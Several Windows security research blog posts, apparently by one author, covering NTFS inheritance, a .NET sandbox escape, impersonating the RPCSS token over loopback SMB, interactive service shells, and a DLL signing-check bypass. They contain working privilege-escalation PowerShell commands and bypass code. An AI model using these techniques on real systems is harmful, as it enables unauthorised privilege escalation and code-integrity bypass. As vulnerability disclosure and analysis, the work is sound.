    The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

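    Roughly, the relevant logic looks like this (a simplified sketch with my own variable names and assumed inheritance flags, not the actual NTFS source):

    BOOLEAN IsDirectory = BooleanFlagOn(CreateOptions, FILE_DIRECTORY_FILE);

    SeAssignSecurityEx(ParentDescriptor,    // SD of the parent directory
                       ExplicitDescriptor,  // NULL when relying on inheritance
                       &NewDescriptor,
                       NULL,                // no object type GUID
                       IsDirectory,         // based solely on the create options
                       SEF_DACL_AUTO_INHERIT | SEF_SACL_AUTO_INHERIT, // assumed flags
                       SubjectContext,
                       IoGetFileObjectGenericMapping(),
                       PagedPool);
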
    The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine: you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, and if you don't specify the flag then a File will be created by default.

    But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verify this behavior on the command prompt.

    C:\> mkdir ABC
    C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
    C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

    First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

    C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
    Incorrect function.

    We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

    C:\> icacls ABC\XYZ
    ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Administrators:(I)(F)

    Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

    C:\> dir ABC
     Volume in drive C has no label.
     Volume Serial Number is 9A7B-865C

     Directory of C:\ABC

    2020-05-20  19:09    <DIR>          .
    2020-05-20  19:09    <DIR>          ..
    2020-05-20  19:05    <DIR>          XYZ


    Is this useful? Honestly, probably not. The only scenario I could imagine it being useful is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

    Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified when determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why the design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


    Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

    By: tiraniddo
    7 May 2020 at 23:12
    It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox; I got a SerializationException thrown with the following text:

    Cannot serialize delegates over unmanaged function pointers, 
    dynamic methods or methods outside the delegate creator's assembly.
       
    I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the takeaway is that at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

    It was then I realized that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

    .NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

    View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

    What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

    However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

    View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

    The problem with this technique is finding a trusted function we can wrap in a delegate and attach to something such as a Windows Forms event handler, which might have the prototype:
    void Callback(object obj, EventArgs e)

    and would call the File.OpenRead function which has the prototype:

    FileStream OpenRead(string path).

    That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, so could we use something like this?

    EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

    Unfortunately not; the C# compiler takes the lambda and generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

    Turns out there's another way. See if you can spot the difference here.

    Expression<EventHandler> lambda = (o,e) => File.OpenRead(@"C:\SomePath")
    EventHandler f = lambda.Compile()

    We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

    That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides that rather than create a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

    View of a stack walk in .NET allowed due to replacing untrusted call frame with an expression generated delegate.

    I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

    Silverlight always had Secure Delegates: it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

    The end result looks like the following:

    View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

    Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including JavaScript engines such as V8 or JSCore.


    Sharing a Logon Session a Little Too Much

    By: tiraniddo
    25 April 2020 at 23:34
    The Logon Session on Windows is tied to a single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

    Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

    "A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

    What does this really mean? Well, if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.
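
    For example, here's a minimal native sketch of specifying the Logon Session ID; the LUID is the target session's Authentication ID and the caller needs TCB for it to be honored:

    #define SECURITY_WIN32
    #include <windows.h>
    #include <security.h>
    #pragma comment(lib, "secur32.lib")

    SECURITY_STATUS AcquireForSession(LUID LogonId, PCredHandle Cred) {
        TimeStamp expiry;
        return AcquireCredentialsHandleW(
            nullptr,                          // principal
            const_cast<LPWSTR>(L"Negotiate"), // package
            SECPKG_CRED_OUTBOUND,
            &LogonId,                         // pvLogonID: the session to use
            nullptr, nullptr, nullptr,        // auth data and key callbacks
            Cred, &expiry);
    }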

    Of course if you have TCB you can almost do whatever you like, so why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives SMB supports which allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

    Note, this is tested on Windows 10 1909; results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process? It also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that; let's try and open the RPCSS service process.

    PS> Get-RunningService "rpcss"
    Name  Status  ProcessId
    ----  ------  ---------
    rpcss Running 1152

    PS> $p = Get-NtProcess -ProcessId 1152
    Get-NtProcess : (0xC0000022) - {Access Denied}
    A process has requested access to an object, but has not been granted those access rights.

    Well, that puts an end to that. But wait, what Token would we get from a loopback authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

    PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
    PS> $job = Start-Job { $pipe.Listen() }

    Next open a handle to the pipe via localhost, and then wait for the job to complete.

    PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
    PS> Wait-Job $job | Out-Null

    Finally open the RPCSS process again while impersonating the named pipe.

    PS> $p = Use-NtObject($pipe.Impersonate()) { 
    >>     Get-NtProcess -ProcessId 1152 
    >>  }
    PS> $p.GrantedAccess
    AllAccess

    How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

    PS> $token = Use-NtObject($pipe.Impersonate()) { 
    >> Get-NtToken -Impersonation 
    >> }
    PS> $token.Groups | ? Name -Match Rpcss
    Name             Attributes
    ----             ----------
    NT SERVICE\RpcSs EnabledByDefault, Owner

    Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

    Taking a joke a little too far.

    By: tiraniddo
    1 April 2020 at 11:00

    Extract from “Rainbow Dash and the Open Plan Office”.

    This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

    Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

    Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

    “Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

    Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

    “Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

    To be continued… not.

    Getting an Interactive Service Account Shell

    By: tiraniddo
    9 February 2020 at 23:21
    Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.
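
    In raw Win32 terms that looks something like the following sketch (error handling elided, and it assumes you've already opened the SYSTEM process with PROCESS_CREATE_PROCESS access):

    #include <windows.h>
    #include <stdlib.h>

    // hParent is a handle to a SYSTEM process (e.g. services.exe) opened
    // with PROCESS_CREATE_PROCESS access.
    HANDLE SpawnSystemShell(HANDLE hParent) {
        SIZE_T size = 0;
        InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
        auto attrs = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(size);
        InitializeProcThreadAttributeList(attrs, 1, 0, &size);
        UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                  &hParent, sizeof(hParent), nullptr, nullptr);

        STARTUPINFOEXW si = {};
        si.StartupInfo.cb = sizeof(si);
        // An interactive desktop so the new process shows on the current session.
        si.StartupInfo.lpDesktop = const_cast<LPWSTR>(L"WinSta0\\Default");
        si.lpAttributeList = attrs;
        PROCESS_INFORMATION pi = {};
        WCHAR cmdline[] = L"powershell.exe";
        CreateProcessW(nullptr, cmdline, nullptr, nullptr, FALSE,
                       EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
                       nullptr, nullptr, &si.StartupInfo, &pi);
        DeleteProcThreadAttributeList(attrs);
        free(attrs);
        CloseHandle(pi.hThread);
        return pi.hProcess;
    }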

    To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

    PS> $p = Start-Win32ChildProcess powershell

    And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

    PS> $user = Get-NtSid -KnownSid LocalService
    PS> $p = Start-Win32ChildProcess powershell -User $user

    The process starts, however you'll find it immediately dies:

    PS> $p.ExitNtStatus
    STATUS_DLL_INIT_FAILED

    The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

    I'll save you the pain: the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc. for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

    One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable: miss one resource and it might still not work, or it might fail at some indeterminate time. Instead we do what the OS does: we create the service token with the Logon Session SID which will grant us access to the session's resources.

    First create a SYSTEM PowerShell process on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

    PS>  $sess = Get-NtToken -Session

    We can print out the Logon Session SID now, for interest:

    PS> $sess.LogonSid.Sid
    Name                                     Sid
    ----                                     ---
    NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

    Now create a Local Service token (or Network Service, or IUser, or any service account) using:

    PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

    You can now create an interactive process on the current desktop using:

    PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

    You should find it now works :-)

    A command prompt, running whoami and showing the user as Local Service.



    DLL Import Redirection in Windows 10 1909

    By: tiraniddo
    8 February 2020 at 16:47
    While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

    What piqued my interest was that during initialization I saw the following code being called:

    NTSTATUS LdrpInitializeImportRedirection() {
        PUNICODE_STRING RedirectionDllName =     
              &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
        if (RedirectionDllName->Length) {
            PVOID Dll;
            NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
            if (NT_SUCCESS(status)) {
                LdrpBuildImportRedirection(Dll);
            }
            // ...
        }

    }

    The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

    Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, but it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value; the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

    BOOL CreateProcessInternalW(...) {
        LPWSTR RedirectionDllName = NULL;
        if (!PackageBreakaway) {
            BasepAppXExtension(PackageName, &RedirectionDllName, ...);
        }


        PRTL_USER_PROCESS_PARAMETERS Params = NULL;
        BasepCreateProcessParameters(&Params, ...);
        if (RedirectionDllName) {
            RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
        }


        // ...

    }

    The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

    Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

    <xs:element name="Properties">
      <xs:complexType>
        <xs:all>
          <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                      minOccurs="0"/>
        </xs:all>
      </xs:complexType>
    </xs:element>

    This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defines the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation; at least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

    With the SO answer I know how to implement it inside my own DLL. I need to define a list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

    BOOL WINAPI CreateProcessWForwarder(
        LPCWSTR lpApplicationName,
        LPWSTR lpCommandLine,
        LPSECURITY_ATTRIBUTES lpProcessAttributes,
        LPSECURITY_ATTRIBUTES lpThreadAttributes,
        BOOL bInheritHandles,
        DWORD dwCreationFlags,
        LPVOID lpEnvironment,
        LPCWSTR lpCurrentDirectory,
        LPSTARTUPINFOW lpStartupInfo,
        LPPROCESS_INFORMATION lpProcessInformation)
    {
        printf("No, I'm not running %ls\n", lpCommandLine);
        return FALSE;
    }


    const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
    {
        { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                      &CreateProcessWForwarder },
    };


    extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
    {
        CURRENT_IMPORT_REDIRECTION_VERSION,
        ARRAYSIZE(RedirectedFunctions),
        RedirectedFunctions

    };

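    For reference, these structures aren't defined in any official header I could find; reconstructed from the usage above and the SO answer they'd look something like this:

    // Reconstructed definitions; the field names are a best guess.
    typedef struct _REDIRECTION_FUNCTION_DESCRIPTOR {
        PCSTR DllName;           // import DLL to match
        PCSTR FunctionName;      // imported function to redirect
        PVOID RedirectionTarget; // the forwarder to call instead
    } REDIRECTION_FUNCTION_DESCRIPTOR;

    #define CURRENT_IMPORT_REDIRECTION_VERSION 1 // assumed value

    typedef struct _REDIRECTION_DESCRIPTOR {
        ULONG Version;
        ULONG FunctionCount;
        const REDIRECTION_FUNCTION_DESCRIPTOR* Redirections;
    } REDIRECTION_DESCRIPTOR;
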
    I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations; it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your application’s dependency graph and doesn’t support GetProcAddress. But you could probably live with that.

    However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

    The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was that when I did, process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

    Trying with a Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND, which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed, binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

    Before I go there are two further undocumented functions (AFAIK) the DLL can export.

    BOOL __ShouldApplyRedirection__(LPWSTR DllName)

    If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

    BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

    This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

    In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess, and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .

    Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

    if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
    {
      status = LdrpSetModuleSigningLevel(FileHandle, 8);
      if (!NT_SUCCESS(status))
        return status;

    }

    If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is a Packaged Process, through a check on the PEB. This is why the load works in a Packaged Application: the check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

    What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

    NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
        DWORD Flags;
        BYTE CurrentLevel;
        NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
        if (NT_SUCCESS(status))
            status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
        if (!NT_SUCCESS(status))
            status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
        return status;

    }

    The code is using the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to get the kernel's Code Integrity module to check the signing level. The signing level must be at least level 8, passed in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.
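    If you want to poke at these checks yourself, the same system calls are exposed through my NtObjectManager module. A minimal sketch (I'm recalling the Get-NtCachedSigningLevel cmdlet's parameters from memory, so treat the exact names as assumptions and check the module's help):

    # Open a file and query its cached signing level (sketch).
    Use-NtObject($file = Get-NtFile -Win32Path "C:\Windows\System32\kernel32.dll") {
        Get-NtCachedSigningLevel $file
    }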

    The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

    The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft-only DLL loading or as a Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog post on VirtualBox (see the section "Exploiting Kernel-Mode Image Loading Behavior").

    Therefore the attack we can perform is as follows:

    1. Copy unsigned Import Redirection DLL to a temporary file.
    2. Open the temporary file for RWX access.
    3. Create an image section object for the file then map the section into memory.
    4. Rewrite the file with the contents of a Microsoft signed DLL.
    5. Close the file and section handles, but do not unmap the memory.
    6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
    7. Profit?

    Copy of CMD running with the CreateProcess hook installed.
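    To make the steps concrete, here's a rough, untested PowerShell sketch of steps 1 to 5. All paths and DLL names are placeholders, the write in step 4 goes through the handle opened before the section was created, and step 6 still needs a manual NtCreateUserProcess call with RedirectionDllName set, which plain PowerShell can't express:

    Add-Type @"
    using System;
    using System.Runtime.InteropServices;
    public static class Native {
        [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
        public static extern IntPtr CreateFile(string name, uint access, uint share,
            IntPtr sa, uint disposition, uint flags, IntPtr template);
        [DllImport("kernel32.dll", SetLastError=true)]
        public static extern IntPtr CreateFileMapping(IntPtr file, IntPtr sa,
            uint protect, uint maxHigh, uint maxLow, string name);
        [DllImport("kernel32.dll", SetLastError=true)]
        public static extern IntPtr MapViewOfFile(IntPtr section, uint access,
            uint offHigh, uint offLow, UIntPtr size);
        [DllImport("kernel32.dll", SetLastError=true)]
        public static extern bool WriteFile(IntPtr file, byte[] buf, uint count,
            out uint written, IntPtr overlapped);
        [DllImport("kernel32.dll", SetLastError=true)]
        public static extern bool CloseHandle(IntPtr h);
    }
    "@

    # Step 1: copy the unsigned redirection DLL to a temporary file.
    $tmp = "$env:TEMP\redirect.dll"
    Copy-Item "C:\path\to\unsigned_redirect.dll" $tmp

    # Step 2: open it read/write/execute (execute access is needed for SEC_IMAGE).
    $file = [Native]::CreateFile($tmp, 0xE0000000, 7, [IntPtr]::Zero, 3, 0, [IntPtr]::Zero)

    # Step 3: create an image section (SEC_IMAGE | PAGE_READONLY) and map a view.
    $sect = [Native]::CreateFileMapping($file, [IntPtr]::Zero, 0x1000002, 0, 0, $null)
    $view = [Native]::MapViewOfFile($sect, 4, 0, 0, [UIntPtr]::Zero)

    # Step 4: rewrite the file with a Microsoft signed DLL's contents.
    $signed = [IO.File]::ReadAllBytes("$env:WINDIR\System32\version.dll")
    $written = 0
    [Native]::WriteFile($file, $signed, $signed.Length, [ref]$written, [IntPtr]::Zero) | Out-Null

    # Step 5: close the file and section handles but leave $view mapped.
    [Native]::CloseHandle($sect) | Out-Null
    [Native]::CloseHandle($file) | Out-Null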

    Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

    Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

    By: tiraniddo
    30 January 2020 at 06:40
    This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

    As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

    PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

    On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right, but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

    Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

    Impersonation flowchart, showing that there's an Origin Session Check.

    Actually this diagram isn't exactly like I've shown before I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

    if (proctoken->AuthenticationId == 
        imptoken->OriginatingLogonSession) {
        return STATUS_SUCCESS;
    }

